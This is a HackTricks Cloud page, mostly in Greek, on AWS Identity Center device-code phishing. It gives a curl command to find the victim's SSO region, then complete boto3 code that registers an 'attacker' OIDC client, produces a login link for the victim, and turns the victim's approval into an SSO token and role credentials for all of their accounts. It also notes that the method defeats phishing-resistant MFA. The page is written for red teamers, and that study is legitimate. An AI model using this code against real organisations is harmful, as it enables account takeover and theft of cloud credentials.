AWS - Identity Center & SSO Unauthenticated Enum

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

AWS Device Code Phishing

Αρχικά προτάθηκε σε αυτή την ανάρτηση blog, είναι δυνατόν να σταλεί ένα link σε έναν χρήστη που χρησιμοποιεί AWS SSO, το οποίο αν αποδεχθεί ο χρήστης, ο επιτιθέμενος θα μπορέσει να αποκτήσει ένα token για να προσποιηθεί τον χρήστη και να έχει πρόσβαση σε όλους τους ρόλους που μπορεί να έχει πρόσβαση ο χρήστης στο Identity Center.

Για να εκτελεστεί αυτή η επίθεση, οι προϋποθέσεις είναι:

Το θύμα πρέπει να χρησιμοποιεί το Identity Center
Ο επιτιθέμενος πρέπει να γνωρίζει το subdomain που χρησιμοποιεί το θύμα <victimsub>.awsapps.com/start

Μόνο με τις προηγούμενες πληροφορίες, ο επιτιθέμενος θα μπορέσει να στείλει ένα link στον χρήστη που αν αποδεχθεί θα παραχωρήσει στον επιτιθέμενο πρόσβαση στον λογαριασμό AWS του χρήστη.

Attack

Finding the subdomain

Το πρώτο βήμα του επιτιθέμενου είναι να ανακαλύψει το subdomain που χρησιμοποιεί η εταιρεία του θύματος στο Identity Center τους. Αυτό μπορεί να γίνει μέσω OSINT ή μαντεψιάς + BF, καθώς οι περισσότερες εταιρείες θα χρησιμοποιούν το όνομά τους ή μια παραλλαγή του ονόματός τους εδώ.

Με αυτές τις πληροφορίες, είναι δυνατόν να αποκτηθεί η περιοχή όπου έχει ρυθμιστεί το Identity Center:

curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"'
"region":"us-east-1

Δημιουργήστε τον σύνδεσμο για το θύμα & Στείλτε τον

Run the following code to generate an AWS SSO login link so the victim can authenticate. Για την επίδειξη, εκτελέστε αυτόν τον κώδικα σε μια κονσόλα python και μην βγείτε από αυτήν καθώς αργότερα θα χρειαστείτε κάποια αντικείμενα για να αποκτήσετε το token:

import boto3

REGION = 'us-east-1' # CHANGE THIS
AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS

sso_oidc = boto3.client('sso-oidc', region_name=REGION)
client = sso_oidc.register_client(
clientName = 'attacker',
clientType = 'public'
)

client_id = client.get('clientId')
client_secret = client.get('clientSecret')
authz = sso_oidc.start_device_authorization(
clientId=client_id,
clientSecret=client_secret,
startUrl=AWS_SSO_START_URL
)

url = authz.get('verificationUriComplete')
deviceCode = authz.get('deviceCode')
print("Give this URL to the victim: " + url)

Στείλτε τον παραγόμενο σύνδεσμο στο θύμα χρησιμοποιώντας τις καταπληκτικές σας ικανότητες κοινωνικής μηχανικής!

Περιμένετε μέχρι το θύμα να το αποδεχτεί

Αν το θύμα ήταν ήδη συνδεδεμένο στο AWS, θα χρειαστεί απλώς να αποδεχτεί την παροχή των δικαιωμάτων, αν δεν ήταν, θα χρειαστεί να συνδεθεί και στη συνέχεια να αποδεχτεί την παροχή των δικαιωμάτων. Αυτή είναι η εμφάνιση του προτροπής σήμερα:

Αποκτήστε το SSO access token

Αν το θύμα αποδέχτηκε την προτροπή, εκτελέστε αυτόν τον κώδικα για να δημιουργήσετε ένα SSO token προσποιούμενοι τον χρήστη:

token_response = sso_oidc.create_token(
clientId=client_id,
clientSecret=client_secret,
grantType="urn:ietf:params:oauth:grant-type:device_code",
deviceCode=deviceCode
)
sso_token = token_response.get('accessToken')

Το διακριτικό πρόσβασης SSO είναι έγκυρο για 8 ώρες.

Προσωποποιήστε τον χρήστη

sso_client = boto3.client('sso', region_name=REGION)

# List accounts where the user has access
aws_accounts_response = sso_client.list_accounts(
accessToken=sso_token,
maxResults=100
)
aws_accounts_response.get('accountList', [])

# Get roles inside an account
roles_response = sso_client.list_account_roles(
accessToken=sso_token,
accountId=<account_id>
)
roles_response.get('roleList', [])

# Get credentials over a role

sts_creds = sso_client.get_role_credentials(
accessToken=sso_token,
roleName=<role_name>,
accountId=<account_id>
)
sts_creds.get('roleCredentials')

Phishing the unphisable MFA

Είναι διασκεδαστικό να γνωρίζουμε ότι η προηγούμενη επίθεση λειτουργεί ακόμη και αν χρησιμοποιείται ένα "unphisable MFA" (webAuth). Αυτό συμβαίνει επειδή η προηγούμενη ροή εργασίας δεν αφήνει το χρησιμοποιούμενο OAuth domain. Όχι όπως σε άλλες επιθέσεις phishing όπου ο χρήστης πρέπει να αντικαταστήσει το domain σύνδεσης, στην περίπτωση που η ροή κωδικού συσκευής είναι προετοιμασμένη έτσι ώστε ένας κωδικός να είναι γνωστός από μια συσκευή και ο χρήστης μπορεί να συνδεθεί ακόμη και σε μια διαφορετική μηχανή. Εάν γίνει αποδεκτή η προτροπή, η συσκευή, απλά γνωρίζοντας τον αρχικό κωδικό, θα είναι σε θέση να ανακτήσει διαπιστευτήρια για τον χρήστη.

Για περισσότερες πληροφορίες σχετικά με αυτό δείτε αυτή την ανάρτηση.

Automatic Tools

References

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - IAM & STS Unauthenticated Enum NextAWS - IoT Unauthenticated Enum

Last updated 3 days ago